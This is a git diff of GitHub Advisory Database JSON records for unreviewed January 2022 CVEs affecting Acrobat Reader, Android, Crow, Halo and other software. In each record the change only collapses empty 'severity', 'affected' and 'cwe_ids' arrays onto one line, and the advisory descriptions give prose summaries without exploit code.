a/advisories/unreviewed/2022/01/GHSA-7j4j-xfgq-3hvf/GHSA-7j4j-xfgq-3hvf.json b/advisories/unreviewed/2022/01/GHSA-7j4j-xfgq-3hvf/GHSA-7j4j-xfgq-3hvf.json index 7f2db424380..ac835ae72fe 100644 --- a/advisories/unreviewed/2022/01/GHSA-7j4j-xfgq-3hvf/GHSA-7j4j-xfgq-3hvf.json +++ b/advisories/unreviewed/2022/01/GHSA-7j4j-xfgq-3hvf/GHSA-7j4j-xfgq-3hvf.json @@ -7,12 +7,8 @@ "CVE-2021-45060" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-7x8x-8m23-mfwj/GHSA-7x8x-8m23-mfwj.json b/advisories/unreviewed/2022/01/GHSA-7x8x-8m23-mfwj/GHSA-7x8x-8m23-mfwj.json index 47c9f0b88e0..f79222b4cb4 100644 --- a/advisories/unreviewed/2022/01/GHSA-7x8x-8m23-mfwj/GHSA-7x8x-8m23-mfwj.json +++ b/advisories/unreviewed/2022/01/GHSA-7x8x-8m23-mfwj/GHSA-7x8x-8m23-mfwj.json @@ -7,12 +7,8 @@ "CVE-2021-44706" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-85x3-59h8-rmrv/GHSA-85x3-59h8-rmrv.json b/advisories/unreviewed/2022/01/GHSA-85x3-59h8-rmrv/GHSA-85x3-59h8-rmrv.json index 7345ce0090d..bd2d6bb6a41 100644 --- a/advisories/unreviewed/2022/01/GHSA-85x3-59h8-rmrv/GHSA-85x3-59h8-rmrv.json +++ b/advisories/unreviewed/2022/01/GHSA-85x3-59h8-rmrv/GHSA-85x3-59h8-rmrv.json @@ -7,12 +7,8 @@ "CVE-2021-44714" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a Violation of Secure Design Principles that could lead to a Security feature bypass. Acrobat Reader DC displays a warning message when a user clicks on a PDF file, which could be used by an attacker to mislead the user. In affected versions, this warning message does not include custom protocols when used by the sender. User interaction is required to abuse this vulnerability as they would need to click 'allow' on the warning message of a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-88gm-r293-5r4m/GHSA-88gm-r293-5r4m.json b/advisories/unreviewed/2022/01/GHSA-88gm-r293-5r4m/GHSA-88gm-r293-5r4m.json index 1700885ade9..2f2c8499e21 100644 --- a/advisories/unreviewed/2022/01/GHSA-88gm-r293-5r4m/GHSA-88gm-r293-5r4m.json +++ b/advisories/unreviewed/2022/01/GHSA-88gm-r293-5r4m/GHSA-88gm-r293-5r4m.json @@ -7,12 +7,8 @@ "CVE-2021-44702" ], "details": "Acrobat Reader DC ActiveX Control versions 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to obtain NTLMv2 credentials. Exploitation of this issue requires user interaction in that a victim must visit an attacker controlled web page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-959f-9f54-m92g/GHSA-959f-9f54-m92g.json b/advisories/unreviewed/2022/01/GHSA-959f-9f54-m92g/GHSA-959f-9f54-m92g.json index f5c01f70073..e0f31ac9cee 100644 --- a/advisories/unreviewed/2022/01/GHSA-959f-9f54-m92g/GHSA-959f-9f54-m92g.json +++ b/advisories/unreviewed/2022/01/GHSA-959f-9f54-m92g/GHSA-959f-9f54-m92g.json @@ -7,12 +7,8 @@ "CVE-2021-44700" ], "details": "Adobe Illustrator versions 25.4.2 (and earlier) and 26.0.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-95v9-qprc-8w66/GHSA-95v9-qprc-8w66.json b/advisories/unreviewed/2022/01/GHSA-95v9-qprc-8w66/GHSA-95v9-qprc-8w66.json index 350164a67f7..3f39bf82931 100644 --- a/advisories/unreviewed/2022/01/GHSA-95v9-qprc-8w66/GHSA-95v9-qprc-8w66.json +++ b/advisories/unreviewed/2022/01/GHSA-95v9-qprc-8w66/GHSA-95v9-qprc-8w66.json @@ -7,12 +7,8 @@ "CVE-2021-40813" ], "details": "A cross-site scripting (XSS) vulnerability in the \"Zip content\" feature in Element-IT HTTP Commander 3.1.9 allows remote authenticated users to inject arbitrary web script or HTML via filenames.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-96pm-r6g4-pggc/GHSA-96pm-r6g4-pggc.json b/advisories/unreviewed/2022/01/GHSA-96pm-r6g4-pggc/GHSA-96pm-r6g4-pggc.json index 397ba29e259..5eacc38521e 100644 --- a/advisories/unreviewed/2022/01/GHSA-96pm-r6g4-pggc/GHSA-96pm-r6g4-pggc.json +++ b/advisories/unreviewed/2022/01/GHSA-96pm-r6g4-pggc/GHSA-96pm-r6g4-pggc.json @@ -7,12 +7,8 @@ "CVE-2021-45052" ], "details": "Adobe Bridge version 11.1.2 (and earlier) and version 12.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious TIF file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-99pj-wqmp-f38g/GHSA-99pj-wqmp-f38g.json b/advisories/unreviewed/2022/01/GHSA-99pj-wqmp-f38g/GHSA-99pj-wqmp-f38g.json index 3f7945a3c34..5125a47238c 100644 --- a/advisories/unreviewed/2022/01/GHSA-99pj-wqmp-f38g/GHSA-99pj-wqmp-f38g.json +++ b/advisories/unreviewed/2022/01/GHSA-99pj-wqmp-f38g/GHSA-99pj-wqmp-f38g.json @@ -7,12 +7,8 @@ "CVE-2021-45068" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-9cqr-9xxq-cx4f/GHSA-9cqr-9xxq-cx4f.json b/advisories/unreviewed/2022/01/GHSA-9cqr-9xxq-cx4f/GHSA-9cqr-9xxq-cx4f.json index c1f8a394535..d3446029de9 100644 --- a/advisories/unreviewed/2022/01/GHSA-9cqr-9xxq-cx4f/GHSA-9cqr-9xxq-cx4f.json +++ b/advisories/unreviewed/2022/01/GHSA-9cqr-9xxq-cx4f/GHSA-9cqr-9xxq-cx4f.json @@ -7,12 +7,8 @@ "CVE-2021-45061" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-9gmc-p2c5-wm4v/GHSA-9gmc-p2c5-wm4v.json b/advisories/unreviewed/2022/01/GHSA-9gmc-p2c5-wm4v/GHSA-9gmc-p2c5-wm4v.json index 4f5f9a59a18..a1b0e1580b2 100644 --- a/advisories/unreviewed/2022/01/GHSA-9gmc-p2c5-wm4v/GHSA-9gmc-p2c5-wm4v.json +++ b/advisories/unreviewed/2022/01/GHSA-9gmc-p2c5-wm4v/GHSA-9gmc-p2c5-wm4v.json @@ -7,12 +7,8 @@ "CVE-2021-39628" ], "details": "In StatusBar.java, there is a possible disclosure of notification content on the lockscreen due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-189575031", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-9x2h-wwhr-53vp/GHSA-9x2h-wwhr-53vp.json b/advisories/unreviewed/2022/01/GHSA-9x2h-wwhr-53vp/GHSA-9x2h-wwhr-53vp.json index 2819772983b..952672da60f 100644 --- a/advisories/unreviewed/2022/01/GHSA-9x2h-wwhr-53vp/GHSA-9x2h-wwhr-53vp.json +++ b/advisories/unreviewed/2022/01/GHSA-9x2h-wwhr-53vp/GHSA-9x2h-wwhr-53vp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-c693-xqp6-3hp2/GHSA-c693-xqp6-3hp2.json b/advisories/unreviewed/2022/01/GHSA-c693-xqp6-3hp2/GHSA-c693-xqp6-3hp2.json index 6aeb2f1ae11..6a6bce12a06 100644 --- a/advisories/unreviewed/2022/01/GHSA-c693-xqp6-3hp2/GHSA-c693-xqp6-3hp2.json +++ b/advisories/unreviewed/2022/01/GHSA-c693-xqp6-3hp2/GHSA-c693-xqp6-3hp2.json @@ -7,12 +7,8 @@ "CVE-2021-45062" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-cg39-r375-5f83/GHSA-cg39-r375-5f83.json b/advisories/unreviewed/2022/01/GHSA-cg39-r375-5f83/GHSA-cg39-r375-5f83.json index dc87ce83090..7eb627fb320 100644 --- a/advisories/unreviewed/2022/01/GHSA-cg39-r375-5f83/GHSA-cg39-r375-5f83.json +++ b/advisories/unreviewed/2022/01/GHSA-cg39-r375-5f83/GHSA-cg39-r375-5f83.json @@ -7,12 +7,8 @@ "CVE-2021-39620" ], "details": "In ipcSetDataReference of Parcel.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-203847542", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-cjf8-rp6j-hxwr/GHSA-cjf8-rp6j-hxwr.json b/advisories/unreviewed/2022/01/GHSA-cjf8-rp6j-hxwr/GHSA-cjf8-rp6j-hxwr.json index f7bafa9d0f0..e1b83822943 100644 --- a/advisories/unreviewed/2022/01/GHSA-cjf8-rp6j-hxwr/GHSA-cjf8-rp6j-hxwr.json +++ b/advisories/unreviewed/2022/01/GHSA-cjf8-rp6j-hxwr/GHSA-cjf8-rp6j-hxwr.json @@ -7,12 +7,8 @@ "CVE-2021-39634" ], "details": "In fs/eventpoll.c, there is a possible use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204450605References: Upstream kernel", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-f55c-c9jm-8544/GHSA-f55c-c9jm-8544.json b/advisories/unreviewed/2022/01/GHSA-f55c-c9jm-8544/GHSA-f55c-c9jm-8544.json index 441c2110750..66370af475b 100644 --- a/advisories/unreviewed/2022/01/GHSA-f55c-c9jm-8544/GHSA-f55c-c9jm-8544.json +++ b/advisories/unreviewed/2022/01/GHSA-f55c-c9jm-8544/GHSA-f55c-c9jm-8544.json @@ -7,12 +7,8 @@ "CVE-2021-39681" ], "details": "In delete_protocol of main.c, there is a possible arbitrary code execution due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200251074References: N/A", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-f639-3h6h-vr46/GHSA-f639-3h6h-vr46.json b/advisories/unreviewed/2022/01/GHSA-f639-3h6h-vr46/GHSA-f639-3h6h-vr46.json index e7faedf55ff..07dac2e1833 100644 --- a/advisories/unreviewed/2022/01/GHSA-f639-3h6h-vr46/GHSA-f639-3h6h-vr46.json +++ b/advisories/unreviewed/2022/01/GHSA-f639-3h6h-vr46/GHSA-f639-3h6h-vr46.json @@ -7,12 +7,8 @@ "CVE-2021-46020" ], "details": "An untrusted pointer dereference in mrb_vm_exec() of mruby v3.0.0 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-g7vj-x88g-9f9w/GHSA-g7vj-x88g-9f9w.json b/advisories/unreviewed/2022/01/GHSA-g7vj-x88g-9f9w/GHSA-g7vj-x88g-9f9w.json index a13271844f3..17daa34f33e 100644 --- a/advisories/unreviewed/2022/01/GHSA-g7vj-x88g-9f9w/GHSA-g7vj-x88g-9f9w.json +++ b/advisories/unreviewed/2022/01/GHSA-g7vj-x88g-9f9w/GHSA-g7vj-x88g-9f9w.json @@ -7,12 +7,8 @@ "CVE-2022-22124" ], "details": "In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary javascript to run on a victim’s browser.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-g94x-mcfx-v65m/GHSA-g94x-mcfx-v65m.json b/advisories/unreviewed/2022/01/GHSA-g94x-mcfx-v65m/GHSA-g94x-mcfx-v65m.json index 941a42f326f..23fdda3ea21 100644 --- a/advisories/unreviewed/2022/01/GHSA-g94x-mcfx-v65m/GHSA-g94x-mcfx-v65m.json +++ b/advisories/unreviewed/2022/01/GHSA-g94x-mcfx-v65m/GHSA-g94x-mcfx-v65m.json @@ -7,12 +7,8 @@ "CVE-2021-45063" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-gj92-2vg9-c8jv/GHSA-gj92-2vg9-c8jv.json b/advisories/unreviewed/2022/01/GHSA-gj92-2vg9-c8jv/GHSA-gj92-2vg9-c8jv.json index b984bd2efc9..acd2a0a4f09 100644 --- a/advisories/unreviewed/2022/01/GHSA-gj92-2vg9-c8jv/GHSA-gj92-2vg9-c8jv.json +++ b/advisories/unreviewed/2022/01/GHSA-gj92-2vg9-c8jv/GHSA-gj92-2vg9-c8jv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-gr6j-4vhj-c665/GHSA-gr6j-4vhj-c665.json b/advisories/unreviewed/2022/01/GHSA-gr6j-4vhj-c665/GHSA-gr6j-4vhj-c665.json index 334a3ded3ee..660b4244b7a 100644 --- a/advisories/unreviewed/2022/01/GHSA-gr6j-4vhj-c665/GHSA-gr6j-4vhj-c665.json +++ b/advisories/unreviewed/2022/01/GHSA-gr6j-4vhj-c665/GHSA-gr6j-4vhj-c665.json @@ -7,12 +7,8 @@ "CVE-2021-46195" ], "details": "GCC v12.0 was discovered to contain an uncontrolled recursion via the component libiberty/rust-demangle.c. This vulnerability allows attackers to cause a Denial of Service (DoS) by consuming excessive CPU and memory resources.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-hjcv-mjwc-3ww3/GHSA-hjcv-mjwc-3ww3.json b/advisories/unreviewed/2022/01/GHSA-hjcv-mjwc-3ww3/GHSA-hjcv-mjwc-3ww3.json index ff37f75f05f..7fa13dbb3e1 100644 --- a/advisories/unreviewed/2022/01/GHSA-hjcv-mjwc-3ww3/GHSA-hjcv-mjwc-3ww3.json +++ b/advisories/unreviewed/2022/01/GHSA-hjcv-mjwc-3ww3/GHSA-hjcv-mjwc-3ww3.json @@ -7,12 +7,8 @@ "CVE-2021-44712" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Access of Memory Location After End of Buffer vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-j4pm-34g3-74pr/GHSA-j4pm-34g3-74pr.json b/advisories/unreviewed/2022/01/GHSA-j4pm-34g3-74pr/GHSA-j4pm-34g3-74pr.json index 8ece20ec90a..d5638a8dff5 100644 --- a/advisories/unreviewed/2022/01/GHSA-j4pm-34g3-74pr/GHSA-j4pm-34g3-74pr.json +++ b/advisories/unreviewed/2022/01/GHSA-j4pm-34g3-74pr/GHSA-j4pm-34g3-74pr.json @@ -7,12 +7,8 @@ "CVE-2021-39683" ], "details": "In copy_from_mbox of sss_ice_util.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202003354References: N/A", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-jwxx-pw7h-7cx3/GHSA-jwxx-pw7h-7cx3.json b/advisories/unreviewed/2022/01/GHSA-jwxx-pw7h-7cx3/GHSA-jwxx-pw7h-7cx3.json index 4f0d4f483fe..5ab36f4bff6 100644 --- a/advisories/unreviewed/2022/01/GHSA-jwxx-pw7h-7cx3/GHSA-jwxx-pw7h-7cx3.json +++ b/advisories/unreviewed/2022/01/GHSA-jwxx-pw7h-7cx3/GHSA-jwxx-pw7h-7cx3.json @@ -7,12 +7,8 @@ "CVE-2021-45769" ], "details": "A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-m754-q244-3crw/GHSA-m754-q244-3crw.json b/advisories/unreviewed/2022/01/GHSA-m754-q244-3crw/GHSA-m754-q244-3crw.json index 63e7e5db41f..6534e600592 100644 --- a/advisories/unreviewed/2022/01/GHSA-m754-q244-3crw/GHSA-m754-q244-3crw.json +++ b/advisories/unreviewed/2022/01/GHSA-m754-q244-3crw/GHSA-m754-q244-3crw.json @@ -7,12 +7,8 @@ "CVE-2021-23514" ], "details": "This affects the package Crow before 0.3+4. It is possible to traverse directories to fetch arbitrary files from the server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-mrxc-w72r-9933/GHSA-mrxc-w72r-9933.json b/advisories/unreviewed/2022/01/GHSA-mrxc-w72r-9933/GHSA-mrxc-w72r-9933.json index d1523244764..bdec9bee190 100644 --- a/advisories/unreviewed/2022/01/GHSA-mrxc-w72r-9933/GHSA-mrxc-w72r-9933.json +++ b/advisories/unreviewed/2022/01/GHSA-mrxc-w72r-9933/GHSA-mrxc-w72r-9933.json @@ -7,12 +7,8 @@ "CVE-2022-22290" ], "details": "Incorrect download source UI in Downloads in Samsung Internet prior to 16.0.6.23 allows attackers to perform domain spoofing via a crafted HTML page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-p88f-g9m7-hv9c/GHSA-p88f-g9m7-hv9c.json b/advisories/unreviewed/2022/01/GHSA-p88f-g9m7-hv9c/GHSA-p88f-g9m7-hv9c.json index 7864548a9c7..119fdbc38e6 100644 --- a/advisories/unreviewed/2022/01/GHSA-p88f-g9m7-hv9c/GHSA-p88f-g9m7-hv9c.json +++ b/advisories/unreviewed/2022/01/GHSA-p88f-g9m7-hv9c/GHSA-p88f-g9m7-hv9c.json @@ -7,12 +7,8 @@ "CVE-2021-40327" ], "details": "Trusted Firmware-M (TF-M) 1.4.0, when Profile Small is used, has incorrect access control. NSPE can access a secure key (held by the Crypto service) based solely on knowledge of its key ID. For example, there is no authorization check associated with the relationship between a caller and a key owner.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-pf8r-282h-75wr/GHSA-pf8r-282h-75wr.json b/advisories/unreviewed/2022/01/GHSA-pf8r-282h-75wr/GHSA-pf8r-282h-75wr.json index f157689eff0..7197b105493 100644 --- a/advisories/unreviewed/2022/01/GHSA-pf8r-282h-75wr/GHSA-pf8r-282h-75wr.json +++ b/advisories/unreviewed/2022/01/GHSA-pf8r-282h-75wr/GHSA-pf8r-282h-75wr.json @@ -7,12 +7,8 @@ "CVE-2021-3965" ], "details": "Certain HP DesignJet products may be vulnerable to unauthenticated HTTP requests which allow viewing and downloading of print job previews.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-pfff-x7fr-4g5m/GHSA-pfff-x7fr-4g5m.json b/advisories/unreviewed/2022/01/GHSA-pfff-x7fr-4g5m/GHSA-pfff-x7fr-4g5m.json index dcb50157b47..541e85d9577 100644 --- a/advisories/unreviewed/2022/01/GHSA-pfff-x7fr-4g5m/GHSA-pfff-x7fr-4g5m.json +++ b/advisories/unreviewed/2022/01/GHSA-pfff-x7fr-4g5m/GHSA-pfff-x7fr-4g5m.json @@ -7,12 +7,8 @@ "CVE-2021-44711" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-pgpr-4m7f-52mm/GHSA-pgpr-4m7f-52mm.json b/advisories/unreviewed/2022/01/GHSA-pgpr-4m7f-52mm/GHSA-pgpr-4m7f-52mm.json index 3983d2427ac..a2595190b99 100644 --- a/advisories/unreviewed/2022/01/GHSA-pgpr-4m7f-52mm/GHSA-pgpr-4m7f-52mm.json +++ b/advisories/unreviewed/2022/01/GHSA-pgpr-4m7f-52mm/GHSA-pgpr-4m7f-52mm.json @@ -7,12 +7,8 @@ "CVE-2022-22122" ], "details": "In Mattermost Focalboard, versions prior to v0.7.5, v0.8.4, v0.9.5, v0.10.1 and v0.11.0-rc1; as used respectively in Mattermost, versions prior to v5.37.6, v5.39.3, v6.0.4, v6.1.1 and v6.2.0, are vulnerable to Insufficient Session Expiration. When a user initiates a logout, their session is not invalidated properly. In addition, user sessions are stored in the browser’s local storage, which by default does not have an expiration time. This makes it possible for an attacker to steal and reuse the cookies using techniques such as XSS attacks, to completely take over a victim account.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-phvc-ghwf-mr3q/GHSA-phvc-ghwf-mr3q.json b/advisories/unreviewed/2022/01/GHSA-phvc-ghwf-mr3q/GHSA-phvc-ghwf-mr3q.json index e781d8cd089..d662e4fdd4f 100644 --- a/advisories/unreviewed/2022/01/GHSA-phvc-ghwf-mr3q/GHSA-phvc-ghwf-mr3q.json +++ b/advisories/unreviewed/2022/01/GHSA-phvc-ghwf-mr3q/GHSA-phvc-ghwf-mr3q.json @@ -7,12 +7,8 @@ "CVE-2021-23824" ], "details": "This affects the package Crow before 0.3+4. When using attributes without quotes in the template, an attacker can manipulate the input to introduce additional attributes, potentially executing code. This may lead to a Cross-site Scripting (XSS) vulnerability, assuming an attacker can influence the value entered into the template. If the template is used to render user-generated content, this vulnerability may escalate to a persistent XSS vulnerability.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-pw59-xgg6-xjqh/GHSA-pw59-xgg6-xjqh.json b/advisories/unreviewed/2022/01/GHSA-pw59-xgg6-xjqh/GHSA-pw59-xgg6-xjqh.json index a49a8812ba9..dd7912f990d 100644 --- a/advisories/unreviewed/2022/01/GHSA-pw59-xgg6-xjqh/GHSA-pw59-xgg6-xjqh.json +++ b/advisories/unreviewed/2022/01/GHSA-pw59-xgg6-xjqh/GHSA-pw59-xgg6-xjqh.json @@ -7,12 +7,8 @@ "CVE-2021-39682" ], "details": "In mgm_alloc_page of memory_group_manager.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-201677538References: N/A", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-q6hq-q4xr-93fp/GHSA-q6hq-q4xr-93fp.json b/advisories/unreviewed/2022/01/GHSA-q6hq-q4xr-93fp/GHSA-q6hq-q4xr-93fp.json index a8f0f9d5a46..a8fe7f98ec4 100644 --- a/advisories/unreviewed/2022/01/GHSA-q6hq-q4xr-93fp/GHSA-q6hq-q4xr-93fp.json +++ b/advisories/unreviewed/2022/01/GHSA-q6hq-q4xr-93fp/GHSA-q6hq-q4xr-93fp.json @@ -7,12 +7,8 @@ "CVE-2021-44234" ], "details": "SAP Business One - version 10.0, extended log stores information that can be of a sensitive nature and give valuable guidance to an attacker or expose sensitive user information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-q7gg-h9mq-mvc3/GHSA-q7gg-h9mq-mvc3.json b/advisories/unreviewed/2022/01/GHSA-q7gg-h9mq-mvc3/GHSA-q7gg-h9mq-mvc3.json index 9051be824d6..2c6d2b39849 100644 --- a/advisories/unreviewed/2022/01/GHSA-q7gg-h9mq-mvc3/GHSA-q7gg-h9mq-mvc3.json +++ b/advisories/unreviewed/2022/01/GHSA-q7gg-h9mq-mvc3/GHSA-q7gg-h9mq-mvc3.json @@ -7,12 +7,8 @@ "CVE-2021-46170" ], "details": "An issue was discovered in JerryScript commit a6ab5e9. There is an Use-After-Free in lexer_compare_identifier_to_string in js-lexer.c file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-qh39-hpr9-w6qx/GHSA-qh39-hpr9-w6qx.json b/advisories/unreviewed/2022/01/GHSA-qh39-hpr9-w6qx/GHSA-qh39-hpr9-w6qx.json index 41eecc3fbe2..b49a1637c0c 100644 --- a/advisories/unreviewed/2022/01/GHSA-qh39-hpr9-w6qx/GHSA-qh39-hpr9-w6qx.json +++ b/advisories/unreviewed/2022/01/GHSA-qh39-hpr9-w6qx/GHSA-qh39-hpr9-w6qx.json @@ -7,12 +7,8 @@ "CVE-2021-45773" ], "details": "A NULL pointer dereference in CS104_IPAddress_setFromString at src/iec60870/cs104/cs104_slave.c of lib60870 commit 0d5e76e can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": 